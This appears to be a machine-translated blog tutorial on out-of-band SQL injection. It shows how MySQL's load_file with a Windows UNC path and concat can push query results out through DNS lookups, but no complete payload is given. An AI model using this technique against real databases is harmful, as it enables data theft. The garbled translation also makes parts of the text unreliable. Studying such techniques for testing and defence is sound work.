Using some database functions to initiate dns resolution features for SQL Injection

Using some database functions to initiate dns resolution features for SQL Injection

First, describe and normalize the description of the SQL injection type.

Four SQL injection methods mentioned earlier. In fact, it is not very appropriate. Specifically, SQL injection should be divided into the following three types.

Inband

Inband technology uses existing channels between attackers and vulnerable Web applications to extract data. Generally, this channel is a standard Web server response. Its member union technology uses existing web pages to output execution results of malicious SQL queries, while error-based technology triggers DBMS error messages for execution results of specific malicious SQL queries.

Inference

In inference technology, attackers can infer data values by differences in application performance. Inference technology can extract malicious SQL query results one by one without actually transmitting data. (That is, the so-called blind note)

Out-of-band (OOB)

In contrast to inband, data is obtained through other transmission channels, such as Hypertext Transfer Protocol and DNS resolution protocol. When detailed error information is disabled, results are restricted or filtered, outbound filtering rules are lax, and/or when the number of reduced queries becomes extremely important, inference technology looks like a unique choice, however, OOB provides a more convenient method.

List tables here to compare their efficiency

DNS leakage, as expected, is slower than the fastest inband (error-based), but faster than the fastest inference method (Boolean blind injection. Here, we need to understand the SQL Injection Using the dns resolution protocol in out-of-band technology. // Comment out your own crude understanding: whether it is the error-based or OOB Technology in Inband, their core is to use the database query expression as a parameter, these functions are passed to some functions to obtain the query expression results, and the results are passed through the error reporting function or remote access. In this way, we can directly view the data value without having to guess. First, let's start with DNS resolution. When a client needs to find the network name used in the program, it will query the DNS server. DNS query has many different resolution methods: 1. If the information has been obtained by the same query in advance, the client can use the local cache information to respond to the query. 2. the DNS server can use its own cache and/or zone record information to respond to queries-this process is called iteration. 3. the DNS server can also forward the query to other DNS servers on behalf of the requested client with a full resolution of the name, and then send the response back to the client-this process is called recursion.

// From here, we can know that the core of this problem is to find a function that can accept remote addresses or initiate network requests, in this way, we can use it to obtain the query expression results.

This makes the problem much clearer.

Here, I tested the load_file function.

In Windows, this function can be used to access an address similar to \ 10.211.55.3 \ ipc $. (This is not the abbreviation of http: //.

// The accompanying: // is abbreviated as http: //, and \ is file :\. Therefore, in windows, the dns query feature should be file: \.

Therefore, the target environment is demanding and requires a Windows Server, and MySQL requires the root permission.

This is only the result of concat.

After load_file, the dns server sends a resolution request

(Do not blame me for the figure QAQ that pulls a rr. Here, the four bars are used for escape. rr: Nai youmeng 2)